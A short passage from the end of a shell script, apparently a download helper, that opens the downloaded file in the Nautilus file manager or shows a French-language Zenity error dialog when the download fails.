/usr/bin/nautilus "$FILENAME"
else
$ZENITY --error --text "Erreur de téléchargement"
fi
fi